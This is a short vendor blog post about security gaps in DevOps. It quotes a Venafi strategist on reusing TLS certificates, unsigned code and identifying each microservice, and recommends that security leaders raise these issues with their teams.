A well-defined DevOps team can be a substantial asset to any organization. The benefits of DevOps are outstanding: effective programs deliver faster response times, increase customer satisfaction, and improve operational efficiency.
Unfortunately, a sizable number of businesses feel that the agility of DevOps may come at the cost of security. As a recent Venafi study revealed, many organizations fail to enforce vital cryptographic security measures in their DevOps environments.
We noticed these issues were especially prevalent amongst organizations that were in the process of adopting DevOps programs. However, even organizations with mature DevOps programs often did not follow security practices that were designed to protect cryptographic keys and digital certificates.
So, how can we improve the operational security of DevOps teams? The first step is making the connection between safety and agility. “Software developers need to think like Formula 1 engineers -- they need to push to extreme limits of speed without crashing.” says Kevin Bocek, chief security strategist for Venafi. “As a result, they must implement safety in everything they do. For DevOps engineers, one key area for safety is security and DevOps automation.”
For example, it’s imperative for developers to uniquely identify each micro-service or container they use. “If they don’t take the time to do this, it leaves a door open that would allow attackers to be authenticated and trusted,” continues Kevin. “Developers focused on speed often reuse a TLS certificate many times over and this also is a DevOps security issue that can allow an adversary to be authenticated and trusted.”
The DevOps security issues that occur during development can become more pronounced as time passes. “Engineers who build code in development pipelines may forget to sign their code using digital certificates, which could allow hackers to make dangerous modifications to code,” says Kevin. “Ultimately, the speed of DevOps can increase the risk that a vulnerability that exists in the development and test environments will move straight through to production.”
So, how can security professionals communicate these issues to their DevOps teams? Kevin believes chief information security officers may be the perfect mediators.
“CIOs get this new risk and the emerging responsibilities of developers,” concludes Kevin. “Recent research found 79% of global CIOs believed the speed of DevOps has made it more difficult to know what is trusted and what is not. As the IT landscape changes, developers must take steps to improve their operational security with DevOps automation. CIOs can help get this conversation started."
Is your DevOps team taking proper steps to improve operational security?